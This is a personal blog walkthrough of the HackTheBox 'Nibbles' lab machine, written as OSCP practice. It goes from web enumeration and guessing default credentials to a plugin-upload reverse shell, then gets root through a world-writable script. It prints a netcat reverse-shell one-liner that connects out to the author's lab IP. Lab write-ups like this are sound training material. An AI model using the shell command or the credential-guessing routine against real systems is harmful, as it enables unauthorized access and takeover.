HTB – Nibbles – Walkthrough

Another day, another box. This one is Nibbles from HTB. A fairly straightforward exploitation that reinforces some good enumeration habits.

In an acorn, we find a webpage with nothing going on. A review of the source code reveals a directory that we can gobuster. We find an admin panel and use some CTF-FU to get it in. Once we’re in, we need to actiave a plugin that allows us to upload a reverse shell. For privesc we find a world writable script and use it to gain root.

As for the OSCP what did this box teach me:

  1. Enumerate, enumerate and enumerate (I literally ran three gobuster scans)
  2. Enumerate extensions!
  3. Learned how world writable files are silly easy methods for privesc

Lets go!

Walkthrough

Nibbles IP address is 10.10.10.75

As always a nmap scan to start off the recon:

We find two ports open:

22/tcp open

80/tcp open

Nothing to report on the full port scan

We travel to 10.10.10.75 and smacked with a page that tells us nothing:

A gobuster here, reveals nothing, so I decide to check the source code of this page to see if there are any indications of something and boom:

Now I rerun my gobuster scan with the new directory and hit paydirt. Directories for days!

But believe it or not, still hitting dead ends. What am I missing!? Oh yeah, extensions!

I rerun my gobuster scan now a third time with extensions and get some more insight as to what’s going on:

Now I see what I missed: admin.php !

I travelled over to the page and was hit with a login screen. Now this is something I always do when I come across a login page on a CTF or machine:

  1. admin:admin
  2. [boxname]:[boxname]
  3. admin:[boxname]

The password here was admin:nibbles

Once I was here I had full administrator access so I immediately started hunting around for ways to upload files and came across this:

Now that I have version number, I can use google to hunt for previously known exploits.

Nibbles is vulnerable to image plugin upload which allowed me to upload a fancy reverse shell.

From here I clicked on image.php and popped a shell.

I apologize for the lack of pictures here, as I must have forgot to take them. But once I popped the shell I found that monitor.sh was world writable.

I added(overwrote):

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.16.7 1234 > /tmp/f

and executed it:

This allowed me to grab any flag I wanted:

Fun, easy quick box! Think it’s time to up the ante and try on some tougher ones!

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s